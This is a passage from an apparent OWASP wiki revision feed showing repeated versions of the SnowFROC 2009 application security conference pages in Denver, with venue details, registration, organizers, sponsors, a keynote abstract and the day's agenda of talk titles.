===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?f=q&amp;amp;hl=en&amp;amp;q=tivoli+denver&amp;amp;ie=UTF8&amp;amp;ll=39.74785,-104.990931&amp;amp;spn=0.040189,0.061626&amp;amp;z=14&amp;amp;iwloc=A map].&lt;br /&gt;
&lt;br /&gt;
By taxi:&lt;br /&gt;
*taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Grossman&amp;diff=54892</id>
		<title>SnowFROC Abstract Grossman</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Grossman&amp;diff=54892"/>
				<updated>2009-02-18T18:03:12Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* The Presentation: &amp;quot;Top Ten Hacks of 2008: What's possible, not probable&amp;quot; */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==The Presentation: &amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;==&lt;br /&gt;
&lt;br /&gt;
Top Ten Web Hacking Techniques of 2008:&lt;br /&gt;
&amp;quot;What's possible, not probable&amp;quot;&lt;br /&gt;
&lt;br /&gt;
The polls are closed, votes are in, and we have the winners making up the Top Ten Web Hacking Techniques of 2008! The competition was fierce with the newest and most innovative web hacking techniques to the test. This session will review the top ten hacks from 2008 - what they indicate about the security of the web, what they mean for businesses, and what might be used against us soon down the road.&lt;br /&gt;
&lt;br /&gt;
==The Speaker: Jeremiah Grossman==&lt;br /&gt;
Jeremiah Grossman is the founder and CTO of WhiteHat Security.  He is considered a world-renowned expert in Web security, is a co- founder of the Web Application Security Consortium, and was named to InfoWorld's Top 25 CTOs for 2007.  Grossman is a frequent speaker at industry events including the Black Hat Briefings, RSA, CSI, HiTB, OWASP, ISSA, and a number of large universities.  He has authored dozens of articles and white papers; is credited with the discovery of many cutting-edge attack and defensive techniques and is a co-author of XSS Attacks. Grossman is often quoted in the the business and technical press.  Prior to WhiteHat, Grossman was an information security officer at Yahoo! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|back to Presentation Agenda]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Grossman&amp;diff=54891</id>
		<title>SnowFROC Abstract Grossman</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Grossman&amp;diff=54891"/>
				<updated>2009-02-18T17:59:54Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* The Presentation: &amp;quot;Top Ten Hacks of 2008: What's possible, not probable&amp;quot; */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==The Presentation: &amp;quot;Top Ten Hacks of 2008: What's possible, not probable&amp;quot;==&lt;br /&gt;
&lt;br /&gt;
Top Ten Web Hacking Techniques of 2008:&lt;br /&gt;
&amp;quot;What's possible, not probable&amp;quot;&lt;br /&gt;
&lt;br /&gt;
The polls are closed, votes are in, and we have the winners making up the Top Ten Web Hacking Techniques of 2008! The competition was fierce with the newest and most innovative web hacking techniques to the test. This session will review the top ten hacks from 2008 - what they indicate about the security of the web, what they mean for businesses, and what might be used against us soon down the road.&lt;br /&gt;
&lt;br /&gt;
==The Speaker: Jeremiah Grossman==&lt;br /&gt;
Jeremiah Grossman is the founder and CTO of WhiteHat Security.  He is considered a world-renowned expert in Web security, is a co- founder of the Web Application Security Consortium, and was named to InfoWorld's Top 25 CTOs for 2007.  Grossman is a frequent speaker at industry events including the Black Hat Briefings, RSA, CSI, HiTB, OWASP, ISSA, and a number of large universities.  He has authored dozens of articles and white papers; is credited with the discovery of many cutting-edge attack and defensive techniques and is a co-author of XSS Attacks. Grossman is often quoted in the the business and technical press.  Prior to WhiteHat, Grossman was an information security officer at Yahoo! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|back to Presentation Agenda]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54199</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54199"/>
				<updated>2009-02-13T18:32:31Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* Agenda and Presentations: 5 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;The Top Ten Hacks of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot; (Tool Release!) &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter the stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP negotiated discounted rates at one or more hotels near the conference venue.  Please email snowfroc@owasp.org for questions regarding accomodation.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?f=q&amp;amp;hl=en&amp;amp;q=tivoli+denver&amp;amp;ie=UTF8&amp;amp;ll=39.74785,-104.990931&amp;amp;spn=0.040189,0.061626&amp;amp;z=14&amp;amp;iwloc=A map].&lt;br /&gt;
&lt;br /&gt;
By taxi:&lt;br /&gt;
*taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54198</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54198"/>
				<updated>2009-02-13T18:32:11Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* Agenda and Presentations: 5 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;The Top Ten Hacks of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot; (Tool Release!) &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter the stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
